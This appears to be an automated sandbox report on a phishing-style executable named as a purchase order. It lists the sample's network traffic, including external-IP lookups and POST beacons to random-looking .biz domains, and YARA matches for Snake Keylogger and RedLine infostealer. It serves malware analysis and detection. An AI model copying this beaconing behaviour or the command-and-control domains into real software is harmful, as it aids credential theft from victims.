                  Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 47.129.31.212:80 -> 192.168.2.7:49922
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                  Source: global traffic HTTP traffic detected: POST /j HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 834
                  Source: global traffic HTTP traffic detected: POST /j HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: ssbzmoy.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
                  Source: global traffic HTTP traffic detected: GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
                  Source: global traffic HTTP traffic detected: POST /hndiufmakse HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 834
                  Source: global traffic HTTP traffic detected: POST /hcvpcb HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
                  Source: global traffic HTTP traffic detected: POST /lxda HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 834
                  Source: global traffic HTTP traffic detected: POST /lkgggwxh HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: przvgke.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
                  Source: global traffic HTTP traffic detected: POST /lsfncqfq HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 834
                  Source: global traffic HTTP traffic detected: POST /algtvyj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
                  Source: global traffic HTTP traffic detected: POST /oxlmrobhj HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 834
                  Source: global traffic HTTP traffic detected: POST /kpnskvgb HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache Host: lpuegx.biz User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400 Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /fmyrcucxukod HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                  Source: global trafficHTTP traffic detected: POST /rdl HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /prgqqrrnmmetm HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                  Source: global trafficHTTP traffic detected: POST /oitulo HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: vjaxhpbji.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
                  Source: global trafficHTTP traffic detected: POST /agmjd HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: xlfhhhm.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49725 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.7:49759 version: TLS 1.0
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /xml/8.46.123.228 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: time.windows.com
                  Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                  Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
                  Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
                  Source: global trafficDNS traffic detected: DNS query: przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: zlenh.biz
                  Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
                  Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
                  Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
                  Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
                  Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
                  Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
                  Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
                  Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
                  Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
                  Source: unknownHTTP traffic detected: POST /j HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443

                  System Summary

                  Source: 42.2.vbc.exe.7590f08.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.8745570.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.7590000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.6272458.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 42.2.vbc.exe.8775190.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.8746478.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.8746478.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.8775190.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.73b6a9e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 22.2.YRtQgzFlDnVSru.exe.36cce48.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 22.2.YRtQgzFlDnVSru.exe.3819e68.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 42.2.vbc.exe.73b6a9e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.73b79a6.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 22.2.YRtQgzFlDnVSru.exe.3819e68.1.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 42.2.vbc.exe.7590f08.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.8745570.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.9ad0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.63bf478.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 0.2.RFQ_PO N89397-GM7287-Order.bat.exe.6272458.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 22.2.YRtQgzFlDnVSru.exe.36cce48.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
                  Source: 42.2.vbc.exe.9ad0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.73b79a6.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 42.2.vbc.exe.7590000.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000002A.00000002.2656794908.0000000007376000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000002A.00000002.2688454630.0000000008741000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000002A.00000002.2702940038.0000000009AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: 0000002A.00000002.2669298938.0000000007590000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: Process Memory Space: vbc.exe PID: 3628, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                  Source: initial sampleStatic PE information: Filename: RFQ_PO N89397-GM7287-Order.bat.exe
                  Source: C:\Windows\System32\alg.exeFile created: C:\Windows\system32\config\systemprofile\AppData\Roaming\f1a1dcf99c90d829.bin
                  Source: C:\Windows\System32\wbengine.exeFile created: C:\Windows\Logs\WindowsBackup
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 17_2_004279F017_2_004279F0
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 17_2_004492A017_2_004492A0
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 17_2_0044EEB017_2_0044EEB0
                  Source: C:\Windows\System32\FXSSVC.exeCode function: 17_2_004493B017_2_004493B0
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 18_2_0089CA2018_2_0089CA20
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 18_2_0089878918_2_00898789
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 18_2_008BA81018_2_008BA810
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 18_2_008979F018_2_008979F0
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 18_2_008B92A018_2_008B92A0
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 18_2_008B93B018_2_008B93B0
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 18_2_00897C0018_2_00897C00
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 18_2_008C2D4018_2_008C2D40
                  Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exeCode function: 18_2_008BEEB018_2_008BEEB0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00D3A81019_2_00D3A810
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00D17C0019_2_00D17C00
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00D179F019_2_00D179F0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00D42D4019_2_00D42D40
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00D3EEB019_2_00D3EEB0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00D392A019_2_00D392A0
                  Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeCode function: 19_2_00D393B019_2_00D393B0
                  Source: C:\Windows\System32\msdtc.exeCode function: 20_2_0057A81020_2_0057A810
                  Source: C:\Windows\System32\msdtc.exeCode function: 20_2_00557C0020_2_00557C00
                  Source: C:\Windows\System32\msdtc.exeCode function: 20_2_00582D4020_2_00582D40
                  Source: C:\Windows\System32\msdtc.exeCode function: 20_2_005579F020_2_005579F0
                  Source: C:\Windows\System32\msdtc.exeCode function: 20_2_0057EEB020_2_0057EEB0
                  Source: C:\Windows\System32\msdtc.exeCode function: 20_2_005792A020_2_005792A0
                  Source: C:\Windows\System32\msdtc.exeCode function: 20_2_005793B020_2_005793B0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00B3A81021_2_00B3A810
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00B17C0021_2_00B17C00
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00B179F021_2_00B179F0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00B42D4021_2_00B42D40
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00B3EEB021_2_00B3EEB0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00B392A021_2_00B392A0
                  Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exeCode function: 21_2_00B393B021_2_00B393B0
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_008622E422_2_008622E4
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_0086373022_2_00863730
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_0086374022_2_00863740
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_069309F822_2_069309F8
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08D4004022_2_08D40040
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08D42FC022_2_08D42FC0
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E328E822_2_08E328E8
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E328D822_2_08E328D8
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3AB4022_2_08E3AB40
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3AB3022_2_08E3AB30
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3BDE022_2_08E3BDE0
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3BDCF22_2_08E3BDCF
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E39E9822_2_08E39E98
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3004022_2_08E30040
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3003E22_2_08E3003E
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3A2C022_2_08E3A2C0
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3A2D022_2_08E3A2D0
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E355F822_2_08E355F8
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3A6F822_2_08E3A6F8
                  Source: C:\Users\user\AppData\Roaming\YRtQgzFlDnVSru.exeCode function: 22_2_08E3A70822_2_08E3A708
                  Source: C:\Windows\System32\Locator.exeCode function: 24_2_004C7C0024_2_004C7C00
                  Source: C:\Windows\System32\Locator.exeCode function: 24_2_004EA81024_2_004EA810
                  Source: C:\Windows\System32\Locator.exeCode function: 24_2_004F2D4024_2_004F2D40
                  Source: C:\Windows\System32\Locator.exeCode function: 24_2_004C79F024_2_004C79F0
                  Source: C:\Windows\System32\Locator.exeCode function: 24_2_004E92A024_2_004E92A0
                  Source: C:\Windows\System32\Locator.exeCode function: 24_2_004EEEB024_2_004EEEB0
                  Source: C:\Windows\System32\Locator.exeCode function: 24_2_004E93B024_2_004E93B0
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 25_2_006C7C0025_2_006C7C00
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 25_2_006EA81025_2_006EA810
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 25_2_006F2D4025_2_006F2D40
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 25_2_006C79F025_2_006C79F0
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 25_2_006E92A025_2_006E92A0
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 25_2_006EEEB025_2_006EEEB0
                  Source: C:\Windows\System32\SensorDataService.exeCode function: 25_2_006E93B025_2_006E93B0
                  Source: C:\Windows\System32\snmptrap.exeCode function: 26_2_00687C0026_2_00687C00
                  Source: C:\Windows\System32\snmptrap.exeCode function: 26_2_006AA81026_2_006AA810
                  Source: C:\Windows\System32\snmptrap.exeCode function: 26_2_006B2D4026_2_006B2D40
                  Source: C:\Windows\System32\snmptrap.exeCode function: 26_2_006879F026_2_006879F0
                  Source: C:\Windows\System32\snmptrap.exeCode function: 26_2_006A92A026_2_006A92A0
                  Source: C:\Windows\System32\snmptrap.exeCode function: 26_2_006AEEB026_2_006AEEB0
                  Source: C:\Windows\System32\snmptrap.exeCode function: 26_2_006A93B026_2_006A93B0
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_0054A81027_2_0054A810
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_00527C0027_2_00527C00
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_00552D4027_2_00552D40
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_005279F027_2_005279F0
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_0054EEB027_2_0054EEB0
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_005492A027_2_005492A0
                  Source: C:\Windows\System32\Spectrum.exeCode function: 27_2_005493B027_2_005493B0
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 28_2_0050A81028_2_0050A810
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 28_2_004E7C0028_2_004E7C00
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 28_2_00512D4028_2_00512D40
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 28_2_004E79F028_2_004E79F0
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 28_2_0050EEB028_2_0050EEB0
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 28_2_005092A028_2_005092A0
                  Source: C:\Windows\System32\OpenSSH\ssh-agent.exeCode function: 28_2_005093B028_2_005093B0
                  Source: C:\Windows\System32\TieringEngineService.exeCode function: 30_2_007FA81030_2_007FA810
                  Source: C:\Windows\System32\TieringEngineService.exeCode function: 30_2_007D7C0030_2_007D7C00
                  Source: C:\Windows\System32\TieringEngineService.exeCode function: 30_2_007D79F030_2_007D79F0
                  Source: C:\Windows\System32\TieringEngineService.exeCode function: 30_2_00802D4030_2_00802D40
                  Source: C:\Windows\System32\TieringEngineService.exeCode function: 30_2_007FEEB030_2_007FEEB0
                  Source: C:\Windows\System32\TieringEngineService.exeCode function: 30_2_007F92A030_2_007F92A0
                  Source: C:\Windows\System32\TieringEngineService.exeCode function: 30_2_007F93B030_2_007F93B0
                  Source: C:\Windows\System32\AgentService.exeCode function: 31_2_00BEA81031_2_00BEA810
                  Source: C:\Windows\System32\AgentService.exeCode function: 31_2_00BC7C0031_2_00BC7C00
                  Source: C:\Windows\System32\AgentService.exeCode function: 31_2_00BC79F031_2_00BC79F0
                  Source: C:\Windows\System32\AgentService.exeCode function: 31_2_00BF2D4031_2_00BF2D40
                  Source: C:\Windows\System32\AgentService.exeCode function: 31_2_00BEEEB031_2_00BEEEB0
                  Source: C:\Windows\System32\AgentService.exeCode function: 31_2_00BE92A031_2_00BE92A0
                  Source: C:\Windows\System32\AgentService.exeCode function: 31_2_00BE93B031_2_00BE93B0
                  Source: C:\Windows\System32\vds.exeCode function: 33_2_00B9A81033_2_00B9A810
                  Source: C:\Windows\System32\vds.exeCode function: 33_2_00B77C0033_2_00B77C00
                  Source: C:\Windows\System32\vds.exeCode function: 33_2_00B779F033_2_00B779F0
                  Source: C:\Windows\System32\vds.exeCode function: 33_2_00BA2D4033_2_00BA2D40
                  Source: C:\Windows\System32\vds.exeCode function: 33_2_00B9EEB033_2_00B9EEB0
                  Source: C:\Windows\System32\vds.exeCode function: 33_2_00B992A033_2_00B992A0
                  Source: C:\Windows\System32\vds.exeCode function: 33_2_00B993B033_2_00B993B0
                  Source: C:\Windows\System32\wbengine.exeCode function: 35_2_00B1A81035_2_00B1A810
                  Source: C:\Windows\System32\wbengine.exeCode function: 35_2_00AF7C0035_2_00AF7C00
                  Source: C:\Windows\System32\wbengine.exeCode function: 35_2_00AF79F035_2_00AF79F0
                  Source: C:\Windows\System32\wbengine.exeCode function: 35_2_00B22D4035_2_00B22D40
                  Source: C:\Windows\System32\wbengine.exeCode function: 35_2_00B1EEB035_2_00B1EEB0
                  Source: C:\Windows\System32\wbengine.exeCode function: 35_2_00B192A035_2_00B192A0
                  Source: C:\Windows\System32\wbengine.exeCode function: 35_2_00B193B035_2_00B193B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_004028B042_2_004028B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00402B9042_2_00402B90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_004073A042_2_004073A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00408C6042_2_00408C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_0040DC1142_2_0040DC11
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00407C3F42_2_00407C3F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00406CA042_2_00406CA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_0040165042_2_00401650
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00402F2042_2_00402F20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00402F8942_2_00402F89
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D151EE42_2_00D151EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D16EAF42_2_00D16EAF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D4598042_2_00D45980
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D539A342_2_00D539A3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D5515C42_2_00D5515C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D4D58042_2_00D4D580
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D4C7F042_2_00D4C7F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D17F8042_2_00D17F80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_00D4378042_2_00D43780
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 42_2_074B0F1042_2_074B0F10
